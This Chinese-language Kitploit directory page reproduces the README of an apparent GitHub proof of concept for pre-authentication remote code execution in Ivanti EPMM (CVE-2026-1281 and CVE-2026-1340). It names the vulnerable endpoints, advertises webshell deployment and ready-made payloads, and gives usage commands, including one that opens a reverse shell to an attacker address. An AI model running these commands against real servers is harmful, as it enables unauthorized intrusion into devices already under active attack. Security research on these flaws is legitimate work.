Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-1281-Ivanti-EPMM-RCE — # CVE-2026-1281 与 CVE-2026-1340 的概念验证 - 通过 Bash 算术展开实现 Ivanti EPMM 预认证远程代码执行 | Kitploit
工具/GitHubGitHub/mehdiledeaut/cve-2026-1281-ivanti-epmm-rce
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试红队Payload 开发
GitHubmehdiledeaut/cve-2026-1281-ivanti-epmm-rce

CVE-2026-1281-Ivanti-EPMM-RCE

# CVE-2026-1281 与 CVE-2026-1340 的概念验证 - 通过 Bash 算术展开实现 Ivanti EPMM 预认证远程代码执行

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
查看仓库
61117个月前尚未审核
分享

CVE-2026-1281 与 CVE-2026-1340 - Ivanti EPMM 预认证 RCE

License Python CVSS

⚠️ 免责声明: 本 PoC 仅用于教育和安全研究目的。未经明确授权使用属违法行为。

🎯 描述

针对影响 Ivanti Endpoint Manager Mobile (EPMM) 的 CVE-2026-1281 和 CVE-2026-1340 漏洞的完整概念验证 (PoC)。这些漏洞允许通过 Bash 算术扩展 机制在无需认证的情况下远程执行任意代码 (RCE)。

漏洞

  • CVE-2026-1281:/mifs/c/appstore/fob/ 端点中的代码注入
  • CVE-2026-1340:/mifs/c/aftstore/fob/ 端点中的代码注入
  • CVSS 评分:9.8(严重)
  • 利用状态:已在野外活跃利用(零日漏洞)

🚀 功能特性

  • ✅ 自动化验证框架(8 项测试)
  • ✅ 预认证 RCE 利用
  • ✅ 自动反向 Shell
  • ✅ WebShell 部署
  • ✅ 50+ 个即用型 Payload
  • ✅ 面向蓝队的检测脚本
  • ✅ 完整文档

📦 安装

root@kitploit:~
git clone https://github.com/MehdiLeDeaut/CVE-2026-1281-Ivanti-EPMM-RCE.git
cd CVE-2026-1281-Ivanti-EPMM-RCE
pip3 install -r requirements.txt
chmod +x *.py

🎯 快速使用

root@kitploit:~
# 漏洞测试
python3 exploit.py -t https://target.com -c

# RCE 验证
python3 exploit.py -t https://target.com --test-rce

# 反向 Shell
python3 exploit.py -t https://target.com --reverse-shell 10.10.14.5:4444

📚 文档

  • 完整 README - 详细技术文档
  • 使用指南 - 分步指南
  • Payloads - 50+ 个 Payload 集合
  • 红队指南 - 实战场景

🔗 参考链接

  • CERT-FR CERTFR-2026-ALE-001
  • Watchtowr Labs 分析
  • CVE-2026-1281
  • CVE-2026-1340

👤 作者

Mehdi Le Deaut - 网络安全顾问 | 红队专家

LinkedIn

⚖️ 许可证

本项目采用 MIT 许可证 - 详情请参阅 LICENSE 文件。

🙏 致谢

  • CERT-FR 的及时预警
  • Watchtowr Labs 的技术分析
  • 网络安全社区
下载工具